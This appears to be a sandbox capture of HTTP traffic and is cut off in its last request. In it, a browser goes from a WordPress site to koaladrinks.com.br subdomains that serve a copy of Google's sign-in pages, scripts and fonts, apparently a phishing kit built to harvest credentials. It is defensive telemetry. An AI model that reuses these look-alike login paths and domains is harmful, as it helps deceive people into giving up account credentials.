Source: global trafficHTTP traffic detected: GET /wp-content/themes/twentytwentyfive/style.css?ver=1.0 HTTP/1.1Host: serviceonesystem.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cliks.serviceonesystem.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=06b8f695ef48ab2d9277 HTTP/1.1Host: serviceonesystem.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cliks.serviceonesystem.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: serviceonesystem.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cliks.serviceonesystem.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/twentytwentyfive/assets/fonts/manrope/Manrope-VariableFont_wght.woff2 HTTP/1.1Host: serviceonesystem.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cliks.serviceonesystem.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cliks.serviceonesystem.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: serviceonesystem.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /XZoMKBqJ HTTP/1.1Host: i.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://cliks.serviceonesystem.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/2017/03/google-drive.jpg HTTP/1.1Host: www.teledataict.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /media/2017/03/google-drive.jpg HTTP/1.1Host: www.teledataict.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /XZoMKBqJ?e=IxiR3J4 HTTP/1.1Host: i.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://i.koaladrinks.com.br/XZoMKBqJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://i.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /ServiceLogin?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://i.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /InteractiveLogin?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AeZLP993-RxQlyVXHlUbKtdjcEd1KHAgrUck3pGkteKVEABv3dN0fTIAcaOZ8yY8Rl-UtMddKCsGsw HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Referer: https://i.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1 HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Referer: https://i.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHib1bm8jnmMUUG53bjMxb43esJQQ/m=_b,_tp HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202/c9748d5c3ac951761ec94a41d03d3d9654c2f89666a929be7fcddaf1832a3cbc.js HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202.js HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: gstatic-fonts.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ijgbload.koaladrinks.com.brsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202 HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"Content-Type: application/jsonsec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202/c9748d5c3ac951761ec94a41d03d3d9654c2f89666a929be7fcddaf1832a3cbc.js HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202.js HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,cciGGe,m9oV,vjKJJ,y5vRwf,L9OGUe,PrPYRd,MpJwZc,cYShmd,hc6Ubd,Rkm0ef,KUM7Z,WpP9Yc,lwddkf,SpsfSb,aC1iue,EFQ78c,xQtZb,zbML3c,zr1jrb,vHEMJe,YHI3We,YTxL4,Uas9Hd,zy0vNb,K0PMbc,qmdT9,LDQI HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO